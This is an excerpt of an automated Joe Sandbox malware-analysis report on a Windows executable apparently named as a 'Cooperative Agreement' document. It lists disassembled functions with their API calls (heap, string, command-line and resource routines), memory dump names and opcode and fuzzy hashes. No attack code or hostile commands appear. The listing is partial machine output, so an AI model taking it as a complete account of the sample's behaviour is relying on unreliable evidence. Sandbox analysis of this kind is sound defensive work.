Part of subcall function 0040D946: HeapFree.KERNEL32(00000000,?,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004), ref: 0040D9A8

DeleteCriticalSection.KERNEL32(00000020,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D9C8
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D9D7

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: CriticalSection$FreeHeap$DeleteEnterLeave
String ID:
API String ID: 3171405041-0
Opcode ID: cbed9a95af3197c0c236be5f183e3b734408b447f4af695c0c167132bfd4a986
Instruction ID: 8e0b58a532cd0764c064264ab0afec864f9344a56e81b99afb7742a3bcd9c4dc
Opcode Fuzzy Hash: cbed9a95af3197c0c236be5f183e3b734408b447f4af695c0c167132bfd4a986
Instruction Fuzzy Hash: 80112B71501601AFC7209F55DC48B96BBB5FF49311F10843EA45A936A1D738A844CF98

Function 00409698 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
Part of subcall function 0040E260: HeapReAlloc.KERNEL32(02390000,00000000,?,?), ref: 0040E2C7

GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
wcscmp.MSVCRT ref: 004096C2
memmove.MSVCRT(00000000,00000008,\\?\,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000), ref: 004096DA

Strings

\\?\, xrefs: 004096BA, 004096D4

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: AllocFileHeapModuleNameValuememmovewcscmp
String ID: \\?\
API String ID: 3734239354-4282027825
Opcode ID: 0153655e129c1090b4fb96721347d81aa5438cd66e58ba985cbb1c9c08f4e59e
Instruction ID: 273bc576c06434c2caee33e7ea90b93358419674725e30c46c8a7bea9ec705d9
Opcode Fuzzy Hash: 0153655e129c1090b4fb96721347d81aa5438cd66e58ba985cbb1c9c08f4e59e
Instruction Fuzzy Hash: BBF0E2B31006017BC210677BDC85CAB7EACEB853747000A3FF515D24D2EA38D82496B8

Function 0040B236 Relevance: 6.3, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040B2D7
memset.MSVCRT ref: 0040B2E0
memset.MSVCRT ref: 0040B2E9
memset.MSVCRT ref: 0040B2F6
memset.MSVCRT ref: 0040B302

Part of subcall function 0040C636: memcpy.MSVCRT(?,?,00000040,?,?,?,?,?,?,?,?,?,00000000,?,0040B275,?), ref: 0040C690
Part of subcall function 0040C636: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0040B275,?), ref: 0040C6DF

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 6af7cb9f910f70f93df9e3bab83db51edc5e588b158ebd52074512bae1687c56
Instruction ID: 0935afcf37e6329c3ac2d0f56793f6a9f9fc9668031c2f15978d8007e640a3dc
Opcode Fuzzy Hash: 6af7cb9f910f70f93df9e3bab83db51edc5e588b158ebd52074512bae1687c56
Instruction Fuzzy Hash: 322103317506083BE524AA29DC86F9F738CDB81708F40063EF241BA2C1CA79E54947AE

Function 00405BA0 Relevance: 6.2, APIs: 4, Instructions: 167memoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,?), ref: 00405C6A
wcsncpy.MSVCRT ref: 00405CC0

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: AllocHeapwcsncpy
String ID:
API String ID: 2304708654-0
Opcode ID: abff55b24cf8305edd91d71e69c9c0649d4e3fc2b61a87c9063bbd8ae977bd8a
Instruction ID: a3f43ae3cc8438659badc3904afd778ac5f48c872593279c616423bb3bd2bb8e
Opcode Fuzzy Hash: abff55b24cf8305edd91d71e69c9c0649d4e3fc2b61a87c9063bbd8ae977bd8a
Instruction Fuzzy Hash: 6D51AD34508B059BDB209F28D844A6B77F4FF84348F544A2EF885A72D0E778E915CB99

Function 00406670 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

CharLowerW.USER32(00417032,?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 00406696
CharLowerW.USER32(00000000,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 004066D0
CharLowerW.USER32(?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 004066FF
CharLowerW.USER32(?,?,?,?,?,?,?,?,?,00402745,00000000,00000000), ref: 00406705

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: CharLower
String ID:
API String ID: 1615517891-0
Opcode ID: e161e10b7a4b34b45bc7c15099726f4e7ff8b3d71e89e60b0d1392e1659b6289
Instruction ID: 50cff0fc212774e4e1f85142edc8b720228546f3e888a8e5f893537154114361
Opcode Fuzzy Hash: e161e10b7a4b34b45bc7c15099726f4e7ff8b3d71e89e60b0d1392e1659b6289
Instruction Fuzzy Hash: 582176796043058BC710AF1D9C40077B7E4EB80364F86483BEC85A3380D639EE169BA9

Function 00412240 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00412271
malloc.MSVCRT ref: 00412281
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041229B
malloc.MSVCRT ref: 004122B0

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: ByteCharMultiWidemalloc
String ID:
API String ID: 2735977093-0
Opcode ID: dda470ae4ce4e8229e703b02ef989f91deb9167292a565bef41a6c3ba200bf59
Instruction ID: 3c1085fe75aa08d7dfcf325d5fd6ce3d1ff6e0efa089dc1519f7c1eb2db8e9d3
Opcode Fuzzy Hash: dda470ae4ce4e8229e703b02ef989f91deb9167292a565bef41a6c3ba200bf59
Instruction Fuzzy Hash: F70145373413013BE2204685AC02FAB3B58CBC1B95F1900BAFF04AE6C0C6F3A80182B8

Function 004121A0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D0B8,00000000), ref: 004121D4
malloc.MSVCRT ref: 004121E4
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 00412201
malloc.MSVCRT ref: 00412216

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: ByteCharMultiWidemalloc
String ID:
API String ID: 2735977093-0
Opcode ID: 00a490c9ef2dc5a478e4fad7c5361c88d21327c35d3ed7742fb63e43f6d77948
Instruction ID: ba92e613a2f9bf0a88025da3432e472bc54701246ba04d0c993b0b67be8a7a27
Opcode Fuzzy Hash: 00a490c9ef2dc5a478e4fad7c5361c88d21327c35d3ed7742fb63e43f6d77948
Instruction Fuzzy Hash: 9401F57B38130137E3205695AC42FBB7B59CB81B95F1900BAFB05AE2C1D6F76814C6B9

Function 0040A96C Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

SHGetFolderLocation.SHELL32(00000000,02399740,00000000,00000000,00000000,00000000,00000000,?,00000104,0040A91B,00000000,00000000,00000104,?), ref: 0040A97E
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040A98F
wcslen.MSVCRT ref: 0040A99A
CoTaskMemFree.OLE32(00000000,?,00000104,0040A91B,00000000,00000000,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000), ref: 0040A9B8

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: FolderFreeFromListLocationPathTaskwcslen
String ID:
API String ID: 4012708801-0
Opcode ID: 19b4b104c0b63c733be71c6c9fc4bbe8097ebb7fbe2648ca0bea1f237fe466b4
Instruction ID: 15676ea375ba95ce47a4ad1d62f3a4f85f84cc5ccd71b7d74cdbb22097095955
Opcode Fuzzy Hash: 19b4b104c0b63c733be71c6c9fc4bbe8097ebb7fbe2648ca0bea1f237fe466b4
Instruction Fuzzy Hash: 51F0D136610614BAC7205B6ADD08DAB7B78EF06660B414126F805E6250E7308920C7E5

Function 00405436 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON

Download Yara Rule

APIs

Part of subcall function 004053EA: EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 004053F5
Part of subcall function 004053EA: LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405428

TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405446
EnterCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405452
CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405472

Part of subcall function 0040DB32: HeapFree.KERNEL32(00000000,-00000008,0040D44B,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB6B

LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405486

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
String ID:
API String ID: 85618057-0
Opcode ID: a2b12058037983e8feb28cac182eb15ba2e3b37f6182c0419abf98dc8b579576
Instruction ID: 3069acd899a723a1849542c16efb52ddeba99d38bb4cb8d15d413c759c742d3e
Opcode Fuzzy Hash: a2b12058037983e8feb28cac182eb15ba2e3b37f6182c0419abf98dc8b579576
Instruction Fuzzy Hash: CDF05432905610AFC2205F619C48AE77B79EF54767715843FF94573190D73868408E6E

Function 00403001 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 193COMMON

Download Yara Rule

APIs

Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7

Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 00405EB0: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000,00000000), ref: 00405F01

Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02390000,00000000,?), ref: 0040DEF9

Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02390000,00000000,?,?), ref: 0040DF1C

Part of subcall function 00402E9D: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402EC5
Part of subcall function 00402E9D: __fprintf_l.LIBCMT ref: 00402F1F

Part of subcall function 00409355: CoInitialize.OLE32(00000000), ref: 00409373
Part of subcall function 00409355: memset.MSVCRT ref: 00409381
Part of subcall function 00409355: LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
Part of subcall function 00409355: GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
Part of subcall function 00409355: wcsncpy.MSVCRT ref: 004093DD
Part of subcall function 00409355: wcslen.MSVCRT ref: 004093F1
Part of subcall function 00409355: CoTaskMemFree.OLE32(?), ref: 0040947A
Part of subcall function 00409355: wcslen.MSVCRT ref: 00409481
Part of subcall function 00409355: FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0

Part of subcall function 00403CD7: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,-00000004,00403A61,00000000,00000001,00000000,00000000,00000001,00000003,00000000), ref: 00403D07

PathAddBackslashW.SHLWAPI(00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000,00000000,FFFFFFF5,00000003,00000000,00000000,00000000,00000000,00000000), ref: 004031CC

Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037

PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,023981B8,00000000,00000000,00000200,00000000,00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000), ref: 00403231

Part of subcall function 00402CA9: FindResourceW.KERNEL32(?,0000000A,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402D44

Strings

$pA, xrefs: 004030CC

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: Value$FindResourcewcslen$AddressAllocateBackslashErrorFreeHeapLastLibraryPathProc$CharInitializeLoadRemoveTaskUpper__fprintf_lmemsetwcsncpy
String ID: $pA
API String ID: 790731606-4007739358
Opcode ID: f33b77279b43f6c2a7ef6627287f9fc20ba1f8a50c04e803199af3b471e760de
Instruction ID: fee6f31afef46dfc3d4b18dc130868db542cea1a9d30875f0fa626089c73850b
Opcode Fuzzy Hash: f33b77279b43f6c2a7ef6627287f9fc20ba1f8a50c04e803199af3b471e760de
Instruction Fuzzy Hash: E151F6B5904A007EE2007BF2DD82E3F266EDFD4719B10893FF844B9092C93C994DA66D

Function 004024F1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 004025A3
PathRemoveArgsW.SHLWAPI(?), ref: 004025D9

Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189

Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02390000,00000000,?), ref: 0040DEF9

Part of subcall function 004098C0: SetEnvironmentVariableW.KERNELBASE(02399740,02399740,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004098D9

Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB

Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037

Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178

Part of subcall function 0040DF50: HeapFree.KERNEL32(02390000,00000000,00000000,?,00000000,?,00411DE4,00000000,00000000,-00000008), ref: 0040DF68

Strings

*pA, xrefs: 004025FF

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: Value$ErrorHeapLast$AllocateArgsCommandEnvironmentFreeLinePathRemoveVariablewcslen
String ID: *pA
API String ID: 1199808876-3833533140
Opcode ID: 11b1f39d3e9737ca0d6b51d618b1608c274ee9a255191aaff6a0b6077b3e1a9a
Instruction ID: 21a80edfc212e2aa9d277187ee9bfa0e7f9d15baa35618845dd156f20ee28a4c
Opcode Fuzzy Hash: 11b1f39d3e9737ca0d6b51d618b1608c274ee9a255191aaff6a0b6077b3e1a9a
Instruction Fuzzy Hash: 6C412DB5904701AED600BBB2DD8293F77ADEBD4309F108D3FF544A9092CA3CD849966E

Function 0040973A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 0040D2E8: TlsGetValue.KERNEL32(?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000,00000000,00000200), ref: 0040D2EF
Part of subcall function 0040D2E8: HeapAlloc.KERNEL32(00000008,?,?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D30A
Part of subcall function 0040D2E8: TlsSetValue.KERNEL32(00000000,?,?,00409869,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D319

GetCommandLineW.KERNEL32(?,?,?,00000000,?,?,00409870,00000000,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015), ref: 00409754

Strings

, xrefs: 0040976E
", xrefs: 00409776

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: Value$AllocCommandHeapLine
String ID: $"
API String ID: 1339485270-3817095088
Opcode ID: 23df4b233d713070fc482b77f76cf6363686a3a5707749b1e186b32a761d8b54
Instruction ID: ab659b79707db7d7869a667e669445cd4c695224699636d93eb587c6e0e94742
Opcode Fuzzy Hash: 23df4b233d713070fc482b77f76cf6363686a3a5707749b1e186b32a761d8b54
Instruction Fuzzy Hash: 4A31A7735252218ADB74AF10981127772A1EFA2B60F18C17FE4926B3D2F37D8D41D369

Function 00409FB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00409FED
wcscmp.MSVCRT ref: 0040A026

Strings

$0A, xrefs: 00409FC4

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: _wcsicmpwcscmp
String ID: $0A
API String ID: 3419221977-513306843
Opcode ID: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
Instruction ID: ce5e94a217663c04e8d70dd0a479d34a80eb67d33ce446282a7f9ad79867738e
Opcode Fuzzy Hash: e4c63d424049f42e7b73257686f90aee44a2e069d1a72a0e60c522d0a3ac157e
Instruction Fuzzy Hash: 2E11C476108B0A8FD3209F46D440923B3E9EF94364720843FD849A3791DB75FC218B6A

Function 00405700 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405722
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405746

Strings

$0A, xrefs: 0040570B

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd

Similarity

API ID: ByteCharMultiWide
String ID: $0A
API String ID: 626452242-513306843
Opcode ID: 6ebf4601a22723825f5cb97cb36f297afbf3d96316567957ce430f2db9d3b6d5
Instruction ID: 257aa3cf1744ec2ccb71e28fb2e26357a5123011e6015fa77bf79efc500ed16d
Opcode Fuzzy Hash: 6ebf4601a22723825f5cb97cb36f297afbf3d96316567957ce430f2db9d3b6d5
Instruction Fuzzy Hash: 16F0393A3862213BE230215A6C0AF672A69CB86F71F2542327B24BF2D085B5680046AC

Function 0040D57F Relevance: 5.1, APIs: 4, Instructions: 134memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?), ref: 0040D593
HeapAlloc.KERNEL32(00000000,-00000018,00000001,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?), ref: 0040D648
HeapAlloc.KERNEL32(00000000,-00000018,?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000), ref: 0040D66B
LeaveCriticalSection.KERNEL32(?,?,00000000,0040A0A4,00000000,00000001,?,?,?,00000000,00409ECC,?,?,00000000,?,?), ref: 0040D6C3

Memory Dump Source

Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
